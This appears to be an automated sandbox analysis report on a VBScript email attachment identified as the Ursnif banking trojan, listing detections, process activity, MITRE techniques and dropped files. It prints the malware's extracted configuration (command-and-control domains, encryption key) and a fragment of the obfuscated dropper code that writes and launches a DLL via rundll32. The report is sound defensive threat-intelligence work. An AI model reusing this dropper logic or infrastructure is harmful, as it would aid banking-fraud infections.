Analysis Report Attachment_32954.vbs

Overview

General Information

Sample Name: Attachment_32954.vbs
Analysis ID: 384531
MD5: 39eb3427fd329de93a19190d84273710
SHA1: 5d9009503b3500c0b6d35e272dd9160e9d873e46
SHA256: adf9ca509037dc8ae4090fa9fa92c8eee621a9860a00da566b25643aa8689799
Tags: vbs

Detection

Ursnif
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Deletes itself after installation
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found potential string decryption / allocating functions
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • wscript.exe (PID: 5540 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Attachment_32954.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • rundll32.exe (PID: 6488 cmdline: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
      • rundll32.exe (PID: 4072 cmdline: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: Ursnif

[{"RSA Public Key": "Xbs4Yk4n2aUcz4nAfmYBHRwWIvRHnuvNCkzGzFhWDffWAD6kAaz2nCrF+u1fBJy8EZGc5Sx4iFpGkK2Uml3/gsvcGmjbZA/KVSRirY7ISIz8qSDXCl7R7DH3QGwTH7G685n2r1rm1yDtD6HT1if24i3j6DsMpQyEccHcvxhbfoMgObXp5CGN5OHsQ+ytis2D"}, {"c2_domain": ["api10.laptok.at/api1", "golang.feel500.at/api1", "go.in100k.at/api1"], "botnet": "2200", "server": "730", "serpent_key": "hPdaZZCB2qcI31br", "sleep_time": "10", "SetWaitableTimer_value": "1"}]

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
20.2.rundll32.exe.70250000.4.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
20.3.rundll32.exe.bca25e.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |

        Sigma Overview

        No Sigma rule has matched

        Signature Overview

        AV Detection:

        Found malware configuration
        Source: 20.2.rundll32.exe.48f94a0.3.raw.unpack | Malware Configuration Extractor: Ursnif [{"RSA Public Key": "Xbs4Yk4n2aUcz4nAfmYBHRwWIvRHnuvNCkzGzFhWDffWAD6kAaz2nCrF+u1fBJy8EZGc5Sx4iFpGkK2Uml3/gsvcGmjbZA/KVSRirY7ISIz8qSDXCl7R7DH3QGwTH7G685n2r1rm1yDtD6HT1if24i3j6DsMpQyEccHcvxhbfoMgObXp5CGN5OHsQ+ytis2D"}, {"c2_domain": ["api10.laptok.at/api1", "golang.feel500.at/api1", "go.in100k.at/api1"], "botnet": "2200", "server": "730", "serpent_key": "hPdaZZCB2qcI31br", "sleep_time": "10", "SetWaitableTimer_value": "1"}]
        Multi AV Scanner detection for dropped file
        Source: C:\Users\user\AppData\Local\Temp\Rabin.dmg | Virustotal: Detection: 50%
        Source: C:\Users\user\AppData\Local\Temp\Rabin.dmg | Metadefender: Detection: 25%
        Source: C:\Users\user\AppData\Local\Temp\Rabin.dmg | ReversingLabs: Detection: 72%
        Multi AV Scanner detection for submitted file
        Source: Attachment_32954.vbs | Virustotal: Detection: 36%
        Source: Attachment_32954.vbs | Metadefender: Detection: 16%
        Source: Attachment_32954.vbs | ReversingLabs: Detection: 31%
        Source: Binary string: c:\Poorplay\halfUs\BoardFamous\outexperience\us.pdb source: wscript.exe, 00000001.00000003.339767368.000001DAF14EF000.00000004.00000001.sdmp, rundll32.exe, 00000014.00000002.473616478.00000000702AD000.00000002.00020000.sdmp, Rabin.dmg.1.dr
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_00DC3512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 20_2_00DC3512
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_702A088D FindFirstFileExW, 20_2_702A088D
        Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
        Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData
        Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local\Temp
        Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Desktop\desktop.ini
        Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Documents\desktop.ini
        Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local

        Key, Mouse, Clipboard, Microphone and Screen Capturing:

        Yara detected Ursnif
        Source: Yara match | File source: 00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 20.2.rundll32.exe.70250000.4.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 20.3.rundll32.exe.bca25e.0.raw.unpack, type: UNPACKEDPE

        E-Banking Fraud:

        Yara detected Ursnif
        Source: Yara match | File source: 00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 20.2.rundll32.exe.70250000.4.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 20.3.rundll32.exe.bca25e.0.raw.unpack, type: UNPACKEDPE
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_7025161B GetProcAddress,NtCreateSection,memset, 20_2_7025161B
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_702515D9 NtMapViewOfSection, 20_2_702515D9
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_702523C5 NtQueryVirtualMemory, 20_2_702523C5
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_00DC11A9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 20_2_00DC11A9
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_00DCB159 NtQueryVirtualMemory, 20_2_00DCB159
        Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\Rabin.dmg 94EB81BC58ADB976F21344D3EB273C9EB833AFBCADD121EB2AD38F1EF07A1F85
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 70294250 appears 39 times
        Source: Attachment_32954.vbs | Initial sample: Strings found which are bigger than 50
        Source: Rabin.dmg.1.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: classification engine | Classification label: mal92.troj.evad.winVBS@5/8@0/0
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_00DC31DD CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 20_2_00DC31DD
        Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\adobe.url
        Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Attachment_32954.vbs'
        Source: C:\Windows\System32\wscript.exe | File read: C:\Users\desktop.ini
        Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer
        Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer
        Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
        Source: Attachment_32954.vbs | Static file information: File size 1444626 > 1048576

        Data Obfuscation:

        VBScript performs obfuscated calls to suspicious functions
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Sleep 7000End With' pervasive glasswort corrector dinghy gander Oedipus mattress morrow Francis vibrato lawman Omaha pledge madstone grub ampersand heredity = 0REM age vex robe, maidservant midge presentation helm Klux racy Brahms judiciary, 1016749 barbarous recalcitrant grove = 1000Do While heredity < 100000000REM impetus Roth fudge souffle decorous Pravda inglorious calculate Paraguayan magnum repairmen Nassau If (heredity = 100000000) ThenWScript.Quit' KS decolletage Moiseyev nameable. Madeline Ellen script catastrophic hardwood Hankel tempest scriptural prime blab Hodges End IfIf (heredity = 5000000) Thengrove = grove + ((800 - 101.0) - ((66 + 3188.0) - 2655.0))End IfIf (heredity = 200) ThenExit DoEnd ifREM room Bohr. shard Germany nightmare standoff. 3540175 tetrahedron, 3863241 holler ailanthus spillover marriage stimulant lacrosse handicraftsman heredity = heredity + 1LoopREM shad eventide hour800 vicissitude Aeneas fledge reflectance bicep optimism enfant swirl, messieurs floorboard, Middletown Mira Ankara With WScript.Sleep 5000End WithEnd FunctionFunction hideout655()REM eyeball knack isomer chromatin Nassau692 Pangaea astonish. caliph, critic oedipal bravo If (InStr(WScript.ScriptName, "TESTING") > 0) ThenREM Iliad rennet manioc. 
visitor bootleg hart slaughterhouse, insurrect, 5691938 jejune clam exterior Rabin176 painstaking MsgBOX("RUN")Exit FunctionEnd Ifmoan("1")Set restaurant = CreateObject("WScript.Shell")restaurant.Run "rundll32" + " " + nepotism + "Rabin.dmg" + ",DllRegisterServer"prime623End FunctionFunction artful(dermatology, stagnant)Dim Byronic, deviateSet Byronic = CreateObject("Scripting.FileSystemObject")Set deviate = Byronic.CreateTextFile(dermatology, True)Dim pawpaw: pawpaw = (16 + (((78 + (-10.0)) - 36.0) + 252.0))Dim felsite506: felsite506 = (((54 + 4882.0) - (6837 - 1931.0)) + (-30.0))For Each soulful In stagnantREM Barr meteorite resonate cabdriver Lysenko sycophantic, 7200240 busywork tremendous facade xylophone locksmith inch RandomizeREM boggy255 tomography pander notebook. 7111724 contour strum period Reese Ouagadougou onrushing pathogenic fractionate = Int((pawpaw-felsite506+1)*Rnd+felsite506)If fractionate < (((90 + 1660.0) - (306 - 101.0)) - 1445.0) Thendeviate.WriteLine(soulful)ElseIf fractionate > (((73 - 20.0) + (31 + 3924.0)) - 3908.0) And fractionate < (((73 - 20.0) + (31 + 3924.0)) - 3908.0) Thendeviate.Write soulful + ":"Elsedeviate.Write soulfuldeviate.WriteBlankLines((((1304 - 545.0) - (27 + 8.0)) - 723.0))End IfNextdeviate.Close' baptism postdoctoral catalogue exclamatory layoff screenplay finny contact. linoleum Sagittarius downhill End FunctionFunction Gerhard()on error resume next' extensible Gibson spiderwort Datsun Barbara telemeter Costello Enoch. plume tribesmen jot sergeant mack Kirkland marriage649 Dim Aides: Set Aides = CreateObject("Scripting.FileSystemObject")' granular perspicacious Zanzibar indisposition oviform riverbank hasten. petunia kittenish tire gemsbok, 98142
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_70252193 push ecx; ret 20_2_702521A3
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_70252140 push ecx; ret 20_2_70252149
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_00DCABF0 push ecx; ret 20_2_00DCABF9
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_00DCAF23 push ecx; ret 20_2_00DCAF33
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_70264AB7 push ebx; ret 20_2_70264AB8
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_70265B21 push edi; ret 20_2_70265B3B
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_70266BBB push ebx; retf 20_2_70266BBD
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_702ABF08 push ecx; ret 20_2_702ABF06
        Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\Rabin.dmg

        Hooking and other Techniques for Hiding and Protection:

        Yara detected Ursnif
        Source: Yara match | File source: 00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 20.2.rundll32.exe.70250000.4.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 20.3.rundll32.exe.bca25e.0.raw.unpack, type: UNPACKEDPE
        Deletes itself after installation
        Source: C:\Windows\System32\wscript.exe | File deleted: c:\users\user\desktop\attachment_32954.vbs
        Source: C:\Windows\System32\wscript.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
        Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
        Source: C:\Windows\System32\wscript.exe TID: 4120 | Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\System32\wscript.exe | File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
        Source: C:\Windows\System32\wscript.exe | File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_7029FAB7 IsDebuggerPresent,OutputDebugStringW, 20_2_7029FAB7
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_702A0417 mov eax, dword ptr fs:[00000030h] 20_2_702A0417
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_702A045B mov eax, dword ptr fs:[00000030h] 20_2_702A045B
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_702A048C mov eax, dword ptr fs:[00000030h] 20_2_702A048C
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_70299DD7 mov eax, dword ptr fs:[00000030h] 20_2_70299DD7
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_702C204F mov eax, dword ptr fs:[00000030h] 20_2_702C204F
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_702C1C56 push dword ptr fs:[00000030h] 20_2_702C1C56
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_702C2390 mov eax, dword ptr fs:[00000030h] 20_2_702C2390
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_7029400F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 20_2_7029400F
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_70294667 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_70294667
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_70299747 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_70299747

        HIPS / PFW / Operating System Protection Evasion:

        Benign windows process drops PE files
        Source: C:\Windows\System32\wscript.exe | File created: Rabin.dmg.1.dr
        Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer
        Source: rundll32.exe, 00000014.00000002.470567376.0000000002FE0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
        Source: rundll32.exe, 00000014.00000002.470567376.0000000002FE0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
        Source: rundll32.exe, 00000014.00000002.470567376.0000000002FE0000.00000002.00000001.sdmp | Binary or memory string: Progman
        Source: rundll32.exe, 00000014.00000002.470567376.0000000002FE0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_00DCA12A cpuid 20_2_00DCA12A
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 20_2_7025111B
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoEx,GetLocaleInfoW, 20_2_7029D950
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 20_2_702A4BBD
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesEx, 20_2_7029D7FD
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW, 20_2_702A5223
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 20_2_702A5349
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW, 20_2_7029D3D7
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW, 20_2_702A544F
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 20_2_702A551E
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW, 20_2_702A4E5F
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW, 20_2_702A4EAA
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW, 20_2_702A4F45
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 20_2_702A4FD0
        Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
        Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_7025116D GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 20_2_7025116D
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_00DCA12A wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 20_2_00DCA12A
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_70251756 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 20_2_70251756
        Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information:

        Yara detected Ursnif
        Source: Yara match | File source: 00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 20.2.rundll32.exe.70250000.4.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 20.3.rundll32.exe.bca25e.0.raw.unpack, type: UNPACKEDPE

        Remote Access Functionality:

        Yara detected Ursnif
        Source: Yara match | File source: 00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 20.2.rundll32.exe.70250000.4.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 20.3.rundll32.exe.bca25e.0.raw.unpack, type: UNPACKEDPE

        Mitre Att&ck Matrix

        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts | Scripting 121 | Path Interception | Process Injection 12 | Masquerading 1 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
        Default Accounts | Exploitation for Client Execution 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion 2 | LSASS Memory | Query Registry 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 12 | Security Account Manager | Security Software Discovery 12 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information 1 | NTDS | Virtualization/Sandbox Evasion 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
        Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting 121 | LSA Secrets | Process Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
        Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 3 | Cached Domain Credentials | Account Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
        External Remote Services | Scheduled Task | Startup Items | Startup Items | Rundll32 1 | DCSync | System Owner/User Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
        Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 1 | Proc Filesystem | File and Directory Discovery 3 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
        Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | File Deletion 1 | /etc/passwd and /etc/shadow | System Information Discovery 45 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        Source | Detection | Scanner | Label | Link
        Attachment_32954.vbs | 37% | Virustotal | | Browse
        Attachment_32954.vbs | 17% | Metadefender | | Browse
        Attachment_32954.vbs | 31% | ReversingLabs | Script-WScript.Trojan.Banker |

        Dropped Files

        Source | Detection | Scanner | Label | Link
        C:\Users\user\AppData\Local\Temp\Rabin.dmg | 51% | Virustotal | | Browse
        C:\Users\user\AppData\Local\Temp\Rabin.dmg | 25% | Metadefender | | Browse
        C:\Users\user\AppData\Local\Temp\Rabin.dmg | 72% | ReversingLabs | Win32.Trojan.Tnega |

        Unpacked PE Files

        Source | Detection | Scanner | Label | Link | Download
        20.2.rundll32.exe.dc0000.2.unpack | 100% | Avira | HEUR/AGEN.1108168 | | Download File

        Domains

        No Antivirus matches

        URLs

        No Antivirus matches

        Domains and IPs

        Contacted Domains

        No contacted domains info

        Contacted IPs

        No contacted IP infos

        General Information

        Joe Sandbox Version: 31.0.0 Emerald
        Analysis ID: 384531
        Start date: 09.04.2021
        Start time: 11:43:12
        Joe Sandbox Product: CloudBasic
        Overall analysis duration: 0h 5m 55s
        Hypervisor based Inspection enabled: false
        Report type: full
        Sample file name: Attachment_32954.vbs
        Cookbook file name: default.jbs
        Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
        Number of analysed new started processes analysed: 26
        Number of new started drivers analysed: 0
        Number of existing processes analysed: 0
        Number of existing drivers analysed: 0
        Number of injected processes analysed: 0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:MAL
        Classification:mal92.troj.evad.winVBS@5/8@0/0
        EGA Information:Failed
        HDC Information:
        • Successful, ratio: 13.2% (good quality ratio 12.6%)
        • Quality average: 79.3%
        • Quality standard deviation: 28.1%
        HCA Information:
        • Successful, ratio: 58%
        • Number of executed functions: 39
        • Number of non-executed functions: 91
        Cookbook Comments:
        • Adjust boot time
        • Enable AMSI
        • Found application associated with file extension: .vbs
        Warnings:
        • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
        • Report size getting too big, too many NtEnumerateKey calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.

        Simulations

        Behavior and APIs

        Time | Type | Description
        11:45:04 | API Interceptor | 1x Sleep call for process: wscript.exe modified

        Joe Sandbox View / Context

        IPs

        No context

        Domains

        No context

        ASN

        No context

        JA3 Fingerprints

        No context

        Dropped Files

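        Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
        C:\Users\user\AppData\Local\Temp\Rabin.dmg | documentation_07531.vbs | Get hash | malicious | Browse |
        C:\Users\user\AppData\Local\Temp\Rabin.dmg | documentation_27396.vbs | Get hash | malicious | Browse |
        C:\Users\user\AppData\Local\Temp\Rabin.dmg | info_70397.vbs | Get hash | malicious | Browse |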

              Created / dropped Files

              C:\Users\user\AppData\Local\Temp\Brewster.m4
              Process:C:\Windows\System32\wscript.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):31
              Entropy (8bit):4.3893648586343925
              Encrypted:false
              SSDEEP:3:jRU/8UElCKe:iEUK8
              MD5:7D9E8C8A31E5DB74A019F387558C2FD7
              SHA1:9F8F21F043CB5CC1B5002F82A3CCD1083074B037
              SHA-256:BF886F8F2A23CF7B8A25DF52438692C14D022409F1D930286ABA34528D64A608
              SHA-512:A076D94E35DD074175A4F48591F7019AE2D71A0A38D56D26A4534758ECECE7E0737F7150950C32DC9B41748CCA31586559FEAA92C3948B9FD45B6C093AC44E33
              Malicious:false
              Reputation:low
              Preview: IgVZEJelgrVSfRAmJyAqahtJlgbdyun
              C:\Users\user\AppData\Local\Temp\Rabin.dmg
              Process:C:\Windows\System32\wscript.exe
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):463360
              Entropy (8bit):6.845616079385091
              Encrypted:false
              SSDEEP:12288:OycGIk5DHw+cppnabV/1XsiXhIbK7boMXBiu7ivtv6g:OycGIPObV/18iVboQWv6
              MD5:B1FC7DC75445A016588402757FDD6FF6
              SHA1:12AA8A932E6711BECA796F67E717523D6794DE9E
              SHA-256:94EB81BC58ADB976F21344D3EB273C9EB833AFBCADD121EB2AD38F1EF07A1F85
              SHA-512:5EA1A7E0D938ED772AB59C486CA6D018814082E50BD000AAFAFD43929983244875792C958A4BDA8B12EDEA1888392C98C33BB26D2D3AFB1A037E1074B6ED9675
              Malicious:true
              Antivirus:
              • Antivirus: Virustotal, Detection: 51%, Browse
              • Antivirus: Metadefender, Detection: 25%, Browse
              • Antivirus: ReversingLabs, Detection: 72%
              Joe Sandbox View:
              • Filename: documentation_07531.vbs, Detection: malicious, Browse
              • Filename: documentation_27396.vbs, Detection: malicious, Browse
              • Filename: info_70397.vbs, Detection: malicious, Browse
              Reputation:low
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....T@`...........!.................?....................................................@.............................\...L...P...............................@...4...T...............................@...............h............................text...L........................... ..`.rdata..j%.......&..................@..@.data...p...........................@....rsrc...............................@..@.reloc..@...........................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\Local\Temp\adobe.url
              Process:C:\Windows\System32\wscript.exe
              File Type:MS Windows 95 Internet shortcut text (URL=<https://adobe.com/>), ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):108
              Entropy (8bit):4.699454908123665
              Encrypted:false
              SSDEEP:3:J25YdimVVG/VClAWPUyxAbABGQEZapfpgtovn:J254vVG/4xPpuFJQxHvn
